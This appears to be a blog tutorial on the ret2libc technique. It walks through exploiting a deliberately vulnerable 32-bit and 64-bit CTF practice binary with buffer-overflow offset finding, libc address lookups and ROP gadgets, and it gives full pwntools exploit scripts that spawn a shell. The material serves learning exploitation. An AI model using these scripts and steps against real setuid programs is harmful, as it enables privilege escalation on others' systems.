description
08/23/2023

⏪ ret2libc

Binary Exploitation used to be extremely intimidating to me. However, I took it day by day and built up brick by brick, and all of a sudden it's not so foreign and scary to me anymore. For anyone starting out, hopefully I influence you to do the same: simply take your time and understand that consistency is truly key. It's come to a point where I can't get enough of it, and I think about it all the time.

Introduction

This is primarily the attack you will use when you notice that the NX protection is ENABLED on the binary that you are attacking. This means that you do NOT have an executable stack to mess around with. This is because the stack memory is protected with the no execute (NX) bit enabled.

Why does this matter to us?

Well, in a typical stack-based buffer overflow, an attacker will be able to write their shellcode into the vulnerable program's stack and be able to execute it on the stack.

But, if the NX bit is ENABLED, we will not be able to execute our shellcode from the vulnerable program's stack.

How does ret2libc work?

This attack allows us to bypass the NX bit protection and divert the program's execution by re-using executable code that already exists in the libc library. Note that the binary is dynamically linked against libc, so the loader maps the library into the program's virtual memory space at run time.

Let's reference this great diagram from Red Team Notes:

{% embed url="https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/return-to-libc-ret2libc" %}

Breakdown of what's going on:

  1. The EIP is being overwritten with the address of the system() function found in the libc library.
  2. Right after the address of system() comes the address of exit(). Once system() returns, the vulnerable program will jump to exit(), which lives in the libc library as well, so the program exits gracefully instead of crashing.
  3. Right after the address of exit(), there's a pointer to a memory location that contains the string /bin/sh which is the argument that will be passed to system() to execute a /bin/sh shell for us, granting us a shell.
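The layout described in the three steps above can be sketched in plain Python with `struct`. This is only an illustration: the padding length and all three addresses are placeholders, and `build_ret2libc_32` is a hypothetical helper name, not something from the tutorial binary.

```python
import struct


def build_ret2libc_32(padding_len, system_addr, exit_addr, binsh_addr):
    """Lay out a 32-bit ret2libc payload: padding, system(), exit(), "/bin/sh" pointer."""
    padding = b"A" * padding_len      # fills the buffer up to the saved EIP
    chain = struct.pack(
        "<III",                       # three little-endian 32-bit words
        system_addr,                  # 1. overwrites the saved EIP
        exit_addr,                    # 2. return address that system() will use
        binsh_addr,                   # 3. first argument to system()
    )
    return padding + chain


# Placeholder values, for illustration only
payload = build_ret2libc_32(16, 0x11111111, 0x22222222, 0x33333333)
print(len(payload))         # 16 bytes of padding + 12 bytes of addresses
print(payload[16:].hex())
```

The order matters on x86: the word right after the function address is treated as that function's return address, and the word after that is its first argument.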

We can see the NX bit is enabled on this 32-bit binary here:

Remember, this means anything that we inject on the stack traditionally, will NOT be executed.

We will be referencing CryptoCat's tutorial on ret2libc for this explanation and guide:

{% embed url="https://www.youtube.com/watch?v=0CFWHjc4B-I" %}

Our Target (x86 Tutorial)

This is a binary and challenge created by CryptoCat, download it here from GitHub to follow along with this tutorial:

{% embed url="https://github.com/Crypto-Cat/CTF/blob/main/pwn/binary_exploitation_101/06-return_to_libc/32-bit/secureserver" %}

Set Proper Permissions

sudo chown root:root secureserver
sudo chmod 4655 secureserver  # This sets the setuid bit (the leading 4)
sudo chown root:root flag.txt
sudo chmod 600 flag.txt

These permissions mimic a real challenge setup: the binary runs with root's privileges, while flag.txt can only be read by root.

Quick Crash Course on Linux Permissions

In root:root, going right to left, the second root is the group that owns the file and the first root is the user that owns the file.

You will have rwx bits that are possible here.

rwx means Read, Write, and Execute.

This will allow/deny you to be able to perform those actions on that file.

The first section (right to left) is the "Others" permission.

The second section is the "Group" permission.

The third section is the "Owner's" permission.

SETUID BIT: The leading 4 in 4655 sets the setuid bit, not the sticky bit (the sticky bit is a leading 1 and is mostly used on directories such as /tmp). A setuid binary runs with the privileges of the file's owner, here root, no matter which user launches it.

  • This can be seen with the RED marking rather than the yellow
  • Also, you can tell it is setuid from the S in the owner's execute slot of the permission bits

For these files in particular, you will still be able to delete them because your directory is likely not root owned. However, if you did NOT set the setuid bit, the binary would run as your own user and would have no access to flag.txt. Also, with these permissions set, you can't view the flag directly unless you're root!
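As a quick sanity check, the two modes used above can be decoded with Python's standard `stat` module. This sketch only interprets the numbers and does not touch any file; the variable names are made up for the example. Note that the leading 4 in 4655 is the setuid bit.

```python
import stat

# S_IFREG marks a regular file; the low bits are the mode passed to chmod
secureserver_mode = stat.S_IFREG | 0o4655
flag_mode = stat.S_IFREG | 0o600

print(stat.filemode(secureserver_mode))            # -rwSr-xr-x
print(stat.filemode(flag_mode))                    # -rw-------
print(bool(secureserver_mode & stat.S_ISUID))      # True: setuid is set
print(bool(secureserver_mode & stat.S_ISVTX))      # False: the sticky bit is not set
```

The capital S appears because the owner has setuid but no execute permission of their own, while group and others keep r-x.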

Enumeration

checksec:

  • 32-bit binary
  • NX ENABLED

file:

{% code overflow="wrap" %}

secureserver: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=ba7b32f02b9ce5948bcb57c33599de4ad17682de, for GNU/Linux 3.2.0, not stripped

{% endcode %}

  • 32-bit
  • Dynamically linked, meaning that instead of including the code for library functions in the program itself, the program links to the libc shared library, which is loaded at run time
    • So, all of this code is stored in YOUR libc library
  • This binary is not stripped, meaning that we still have the symbol table (function names and so on), making our life easier when reversing

Ghidra

So, since we are dynamically linking to the libc library, when our program calls a libc function it goes through the Global Offset Table (GOT), which holds the address of that function inside the loaded libc. These addresses will differ between machines since there are different versions of libc. It also means that libc's code is mapped into our process, so we can RETURN to functions FOUND IN libc.

libc contains functions such as system(). If we return into system() and pass it the argument /bin/sh, it will run that command for us, hopefully granting us a shell.

You can actually see the GOT in Ghidra within the Program tree:

Let's look through our functions in our symbol tree to find a vulnerable function to target:

After some analysis, I found a function that calls the vulnerable and deprecated gets() function. This is now our target: receive_feedback().

So let's check out the function and see if we can find a buffer size we can attack:

void receive_feedback(void)

{
  char local_4c [68];
  
  puts("Please leave your comments for the server admin but DON\'T try to steal our flag.txt:\n");
  gets(local_4c);
  return;
}

So, we see a buffer size of 68 from our decompilation code for receive_feedback().

The next objective is to find the offset to the instruction pointer (EIP).

Finding the Offset to the Instruction Pointer (EIP)

Let's send a cyclic pattern of 100 characters to the buffer. We can generate it with pwndbg's cyclic command inside gdb:

{% code overflow="wrap" %}

cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

{% endcode %}

Copy this and be ready to send it to the program.

You might be asking yourself: Why is our EIP address: 0x61616174?

Well, that is because that is the hex value of "taaa"!

We can confirm this by running hex and passing "taaa" as the argument:

hex taaa
74616161

Okay, cool, but why is it backwards? This is because x86 is little-endian: the least significant byte of a value is stored at the lowest address, so the bytes "taaa" in memory are read back as the number 0x61616174.

From this, we can see that we begin to overwrite the EIP with our pattern at "taaa", so we can then use cyclic -l taaa to find our offset to EIP:

So what if I told you there's even an easier way to find the offset to the instruction pointer?

In Ghidra, if we go to our target function, the name of the buffer tells us its stack offset. We can convert that hex value to decimal with a calculator and find the offset too!!!

Our buffer is named local_4c, so it starts 0x4c bytes before the saved return address.

Let's convert that to decimal:

We get 76, how crazy is that??
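Both ways of finding the offset can be double-checked in a few lines of Python. The sketch below reuses the pattern from the cyclic output above and the crashed EIP value 0x61616174; it uses only the standard library rather than pwntools, and the variable names are chosen for the example.

```python
import struct

# Pattern copied from the `cyclic 100` output above
pattern = (b"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaa"
           b"paaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa")

eip = 0x61616174                    # value seen in EIP after the crash
needle = struct.pack("<I", eip)     # little-endian bytes as they sat in memory
offset = pattern.index(needle)      # where those bytes start in the pattern

print(needle)                       # b'taaa'
print(offset)                       # 76
print(int("4c", 16))                # 76, the Ghidra route (local_4c)
```

Packing the value as little-endian is what turns 0x61616174 back into the bytes "taaa", which is the same conversion `cyclic -l` performs for us.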

Finding libc Base Address

So, we are going to overwrite the instruction pointer with a function within the libc library.

For this example, we will call system(), found in libc, and pass /bin/sh as an argument.

We can use pwndbg to search for /bin/sh in our library:

search -t "/bin/sh"

There is also another way that we can do this on a LOCAL system:

ldd <binary_name>

That address is where our libc library is located in memory.

Address Space Layout Randomization (ASLR)

However, this address is constantly subject to change as long as Address Space Layout Randomization (ASLR) is ENABLED.

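This protection is enabled by default on modern Linux systems. It does not prevent the overflow itself, but it makes exploitation harder because hardcoded addresses stop working.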

We can disable ASLR with the following command.

NOTE: It will be enabled again after a reboot and requires sudo or root privileges:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

If we now run ldd on our binary several times, we will see that the libc address no longer changes.

The address 0xf7d81000 is the base address of the libc library.
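To confirm which ASLR mode is active before trusting a hardcoded base address, the same procfs file can be read from Python. This is a small sketch: `describe_aslr` and `ASLR_MODES` are hypothetical names, and the file is only read if it exists (that is, on Linux).

```python
from pathlib import Path

# Meaning of the values in /proc/sys/kernel/randomize_va_space
ASLR_MODES = {
    0: "disabled",
    1: "conservative randomization",
    2: "full randomization",
}


def describe_aslr(raw):
    """Translate the raw file contents (e.g. '0\\n') into a readable label."""
    return ASLR_MODES.get(int(raw.strip()), "unknown")


path = Path("/proc/sys/kernel/randomize_va_space")
if path.exists():
    print(describe_aslr(path.read_text()))
```

After running the echo 0 command above, this should report disabled until the next reboot.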

Finding system() Offset

Great, so where is system() now?

We can use readelf to help us find this and pipe it to grep to better query our results:

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
2166: 00048150    63 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.0

So 0x48150 is the OFFSET of system() from our base address for libc.

However, if we were attacking a server remotely, there are techniques that we could use to "leak" out functions and use the same technique above to find the offset to the base address of libc.

You can then add the offset of system() to the base address and you will get the address of the targeted function.

In conclusion, you want to find the base of the libc library and then you will be able to find the offsets to other functions.

  • Don't worry, we will go more in depth into this in the future
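The base-plus-offset arithmetic can be sketched in Python using the readelf line and the libc base shown above. `symbol_offset` is a hypothetical helper that simply takes the second column of a readelf -s row; the values will differ on your machine.

```python
# Values copied from the output above; yours will differ
readelf_line = "2166: 00048150    63 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.0"
libc_base = 0xf7d81000


def symbol_offset(line):
    """Return the Value column of a `readelf -s` row as an integer."""
    fields = line.split()
    return int(fields[1], 16)   # second column is the hex offset in the file


system_offset = symbol_offset(readelf_line)
system_addr = libc_base + system_offset

print(hex(system_offset))   # 0x48150
print(hex(system_addr))     # 0xf7dc9150
```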

Finding /bin/sh String Offset

So, if we run strings on the libc library with -t x, it prints each string together with its hex offset from the start of the file, which is also its offset from our base address.

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
1bd0f5 /bin/sh

0x1bd0f5 is the OFFSET of the /bin/sh string from the libc base.
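What strings -t x does here boils down to finding where the bytes of "/bin/sh" start in the file. A minimal sketch of that idea follows, run against a small fake blob so it stays self-contained; `find_string_offset` and `fake_libc` are made up for the example. With a real libc you would pass the bytes of the library file instead.

```python
def find_string_offset(data, needle=b"/bin/sh\x00"):
    """Return the offset of the first NUL-terminated match, or -1 if absent."""
    return data.find(needle)


# Stand-in for the bytes of a libc file: 32 bytes of filler, then the string
fake_libc = b"\x7fELF" + b"\x00" * 28 + b"/bin/sh\x00" + b"tail"
print(hex(find_string_offset(fake_libc)))   # 0x20

# Same arithmetic as before, with the real offset reported by strings above
libc_base = 0xf7d81000
binsh_addr = libc_base + 0x1bd0f5
print(hex(binsh_addr))                      # 0xf7f3e0f5
```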

Exploit Development

When it comes to building an exploit for ret2libc, this is an excellent template to use.

exploit.py:

{% code lineNumbers="true" %}

from pwn import *


# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())


# Binary filename
exe = './secureserver'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Change logging level to help with debugging (error/warning/info/debug)
context.log_level = 'debug'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

io = start()

# Lib-c offsets, found manually (ASLR_OFF)
libc_base = 0xf7d81000
system = libc_base + 0x48150
binsh = libc_base + 0x1bd0f5

# Print out our addresses
info('libc_base: %#x', libc_base)
info('system: %#x', system)
info('binsh: %#x', binsh)

# How many bytes to the instruction pointer (EIP)?
padding = 76

payload = flat(
    asm('nop') * padding,  # Padding up to EIP
    system,  # Address of system function in libc
    0x0,  # Return address for system() -- can be garbage; on x86 it sits between the function address and its argument
    binsh  # Address of /bin/sh in libc
)

# Write payload to file
write('payload', payload)

# Exploit
io.sendlineafter(b':', payload)

# Get flag/shell
io.interactive()

{% endcode %}

Be sure to populate the variables with the proper addresses/offsets.

Successful automated exploit

Analyzing the Payload in gdb

Throwing our program back in gdb and viewing what is going on is pretty cool stuff. It allows you to gain a more intuitive understanding of what is going on in memory and how your exploit works if you ever needed to troubleshoot it.

Set a breakpoint for main with b main.

Run the binary with r.

Great, we can now start examining our addresses and what data is located within them.

Examining libc base address:

pwndbg> x 0xf7d81000
0xf7d81000:     0x464c457f

In English: x is examine, and the address is our libc base address.

Examine system() minus the offset of system():

pwndbg> x/s 0xf7dc9150 - 0x48150
0xf7d81000:     "\177ELF\001\001\001\003"

In English: x is examine, /s is convert to string, and the offset is that of system().

If you see ELF, this means we are at the base of libc (the start of its ELF header) and that everything is aligning properly.
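The two gdb outputs above are the same four bytes shown in two ways, which is easy to confirm in Python. This sketch uses only the values printed by gdb above.

```python
import struct

word = 0x464c457f                   # what `x 0xf7d81000` printed
raw = struct.pack("<I", word)       # the bytes as they sit in memory
print(raw)                          # b'\x7fELF'

# gdb's string view shows 0x7f in octal as \177
print(int("177", 8) == 0x7f)        # True

# system() address minus its offset lands back on the libc base
system_addr = 0xf7dc9150
system_offset = 0x48150
print(hex(system_addr - system_offset))   # 0xf7d81000
```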

Now this part is interesting. Remember the breakdown of the stack diagram above that illustrated the overflow?

Step 3 said the last value in our payload is a pointer to the "/bin/sh" string. gdb's x command reuses the last format we gave it (/s), so a plain x on that address prints the string back without us asking for /s again!

pwndbg> x 0xf7f3e0f5
0xf7f3e0f5:     "/bin/sh"

In English: x is examine, and the address is our "/bin/sh".

Manual Exploitation w/ our Payload

We can actually use cat with our payload as the argument and pipe it to our binary to exploit it as well and gain a shell:

cat payload - | ./secureserver

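Just be warned that the shell prints no prompt here, most likely because its STDIN is a pipe rather than a terminal. Type a command such as id and press Enter to confirm it is running. The - argument makes cat keep forwarding your keyboard input after the payload has been sent.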

Our Target (x64 Tutorial)

We will be attacking the same target/binary, except this time it is compiled as an x64 binary.

The difference is how arguments are passed on an x64 target. So we are going to need a POP RDI ROP gadget to load our argument.

Remember, on x86 a function reads its arguments from the stack, while on x64 (System V calling convention) the first argument is read from the RDI register.

{% embed url="https://github.com/Crypto-Cat/CTF/blob/main/pwn/binary_exploitation_101/06-return_to_libc/64-bit/secureserver" %}

Set Proper Permissions

sudo chown root:root secureserver
sudo chmod 4655 secureserver  # This sets the setuid bit (the leading 4)
sudo chown root:root flag.txt
sudo chmod 600 flag.txt

Enumeration

file:

{% code overflow="wrap" %}

secureserver: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f890ad80b62339e815e93e095690235d1466bfbb, for GNU/Linux 3.2.0, not stripped

{% endcode %}

  • x64 Binary -- Need ROP gadgets to POP values into the correct registers
  • Dynamically linked, which is very important to us as we will need to divert execution from our vulnerable function's return address via overwrite to the libc library
  • Not stripped, so this will make our lives easier to find lucrative details in Ghidra/gdb

checksec:

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
  • NX is ENABLED
  • This makes it a fantastic target for the ret2libc exploitation technique

Finding ret ROP Gadgets with ropper

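I kept running into stack-alignment issues on Ubuntu. The likely cause is that the x86-64 System V ABI expects the stack to be 16-byte aligned at a call, and recent glibc builds use SSE instructions such as movaps inside system() that crash on a misaligned stack. Adding a single ret ROP gadget shifts the stack by 8 bytes, so I had to add one in order for my exploit to work.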

With that said, you may not need this.

ropper --file secureserver --search "ret"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: ret

[INFO] File: secureserver
0x0000000000401016: ret;

To fix our issue, I am simply using a return gadget.

You can see that 0x401016 is the address of the ret gadget we need to add to our chain.
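Why one extra ret helps can be seen with a toy model of the stack pointer. The sketch below assumes the saved return address of the vulnerable function sits at an address that is 8 modulo 16 (the usual state right after a call), and that a function expects RSP to be 8 modulo 16 when it is entered. The slot address and the helper name are hypothetical.

```python
def rsp_when_entering_system(chain, ret_slot):
    """Model RSP at the moment a ROP chain transfers control to system()."""
    rsp = ret_slot
    i = 0
    while True:
        entry = chain[i]
        rsp += 8            # a `ret` pops this entry into RIP
        i += 1
        if entry == "system":
            return rsp
        if entry == "pop_rdi":
            rsp += 8        # `pop rdi` consumes the next word (the argument)
            i += 1
        # a bare "ret" gadget consumes nothing extra; its own ret is
        # accounted for at the top of the next loop iteration


RET_SLOT = 0x7fffffffe008   # hypothetical address, 8 modulo 16

without_ret = rsp_when_entering_system(["pop_rdi", "binsh", "system"], RET_SLOT)
with_ret = rsp_when_entering_system(["ret", "pop_rdi", "binsh", "system"], RET_SLOT)

print(without_ret % 16)     # 0 -> not what a function entry expects
print(with_ret % 16)        # 8 -> same state as after a normal call
```

In this model the chain without the extra gadget enters system() with the stack off by 8 bytes, which is the situation where aligned SSE instructions fault.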

Finding POP RDI ROP Gadgets with ropper

ropper --file secureserver --search "pop rdi"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi

[INFO] File: secureserver
0x000000000040120b: pop rdi; ret;

You can see that the address, 0x40120b is what we will need to POP "/bin/sh" into the RDI register as it is our first parameter/argument.

NOTE: Be sure to add this to your exploit code.

So, when the system() function is called, it will look in the RDI register for this string.

Finding Base Address for 64-bit libc Library

ldd secureserver
        linux-vdso.so.1 (0x00007ffff7fc1000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7d8b000)
        /lib64/ld-linux-x86-64.so.2 (0x00007ffff7fc3000)

64-bit address for the libc base: 0x7ffff7d8b000
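If you script this step, the base address can be pulled out of the ldd output with a regular expression. This is a sketch over the exact output shown above; `libc_base_from_ldd` is a hypothetical helper, and the path in the pattern assumes the library is named libc.so.6.

```python
import re

# Output copied from the ldd run above
ldd_output = """\
        linux-vdso.so.1 (0x00007ffff7fc1000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7d8b000)
        /lib64/ld-linux-x86-64.so.2 (0x00007ffff7fc3000)
"""


def libc_base_from_ldd(text):
    """Extract the load address that ldd reports for libc.so.6."""
    match = re.search(r"libc\.so\.6 => \S+ \((0x[0-9a-f]+)\)", text)
    if match is None:
        raise ValueError("libc.so.6 not found in ldd output")
    return int(match.group(1), 16)


print(hex(libc_base_from_ldd(ldd_output)))   # 0x7ffff7d8b000
```

Keep in mind the address is only stable while ASLR is disabled.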

Finding system() Offset

readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
  1481: 0000000000050d60    45 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.2.5

Our offset to system() from the base address is: 50d60

Finding "/bin/sh" String Offset

strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
 1d8698 /bin/sh

Our offset for the "/bin/sh" string from the base address is: 1d8698
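With the base and both offsets in hand, the final addresses are simple additions. The sketch below also checks one practical detail: gets() stops reading at a newline, so no address in the chain may contain the byte 0x0a. `contains_newline` is a hypothetical helper, and all values are the ones gathered above.

```python
import struct

libc_base = 0x7ffff7d8b000
system = libc_base + 0x50d60
binsh = libc_base + 0x1d8698
ret = 0x401016
pop_rdi = 0x40120b

print(hex(system))   # 0x7ffff7ddbd60
print(hex(binsh))    # 0x7ffff7f63698


def contains_newline(value):
    """True if the 64-bit little-endian encoding of value has a 0x0a byte."""
    return b"\n" in struct.pack("<Q", value)


bad = [hex(v) for v in (ret, pop_rdi, binsh, system) if contains_newline(v)]
print(bad)           # [] -> nothing here would cut the payload short
```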

Finding the Offset to the Instruction Pointer (RIP)

Load up Ghidra and navigate to the vulnerable function, receive_feedback() in the Symbol Tree:

We see 0x48 is the offset, so let's convert that to decimal to get our padding for our payload:

This means that our padding will be 72.

Exploit Development (pwntools)

Be sure to add the addresses, offsets, and padding we gathered above to your exploit code:

exploit.py:

{% code lineNumbers="true" %}

from pwn import *


# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())


# Binary filename
exe = './secureserver'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Change logging level to help with debugging (error/warning/info/debug)
context.log_level = 'debug'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

io = start()

# Lib-c offsets, found manually (ASLR_OFF)
libc_base = 0x7ffff7d8b000
system = libc_base + 0x50d60
binsh = libc_base + 0x1d8698

# ROP gadgets (found with ropper)
ret = 0x401016
pop_rdi = 0x40120b

# How many bytes to the instruction pointer (RIP)?
padding = 72

payload = flat(
    asm('nop') * padding,  # Padding up to RIP
    ret,  # Extra ret gadget for stack alignment
    pop_rdi,  # Pop the following address into the RDI register
    binsh,  # Address of /bin/sh in libc
    system,  # Address of system function in libc
)

# Write payload to file
write('payload', payload)

# Exploit
io.sendlineafter(b':', payload)

# Get flag/shell
io.interactive()

{% endcode %}

Exploit Code Analysis

Breaking down our payload:

Our padding of 72 bytes was obtained from the distance between the start of our vulnerable function's buffer and its saved return address (RIP).

Write the padding with asm('nop') * padding,.

We will then use our ret ROP gadget to return to aid in stack alignment.

We then utilize pop_rdi to POP the next value OFF the stack into the RDI register.

  • The value is of course binsh

Lastly, we return into system().

NOTE: We also write our payload to a file named payload via:

write('payload', payload)

We will then use sendlineafter to deliver our payload variable after the : that is found in console which is the last character before awaiting STDIN from the user of the program:

io.sendlineafter(b':', payload)
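To see the exact bytes that end up on the wire, the same payload can be assembled without pwntools. This is a sketch using only `struct`, with the addresses computed earlier (libc base plus offsets, ASLR off) hardcoded; b"\x90" is the single-byte x86 nop.

```python
import struct

padding = 72
chain = [
    0x401016,          # ret gadget (stack alignment)
    0x40120b,          # pop rdi; ret
    0x7ffff7f63698,    # address of "/bin/sh" (libc base + 0x1d8698)
    0x7ffff7ddbd60,    # address of system() (libc base + 0x50d60)
]

# Each entry becomes one little-endian 8-byte word after the padding
payload = b"\x90" * padding + b"".join(struct.pack("<Q", word) for word in chain)

print(len(payload))            # 104
print(payload[72:80].hex())    # 1610400000000000
```

Every entry takes 8 bytes on x64, so the chain adds 32 bytes after the 72 bytes of padding.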

Automated Result

python3 exploit.py

Manual Exploitation Result

cat payload - | ./secureserver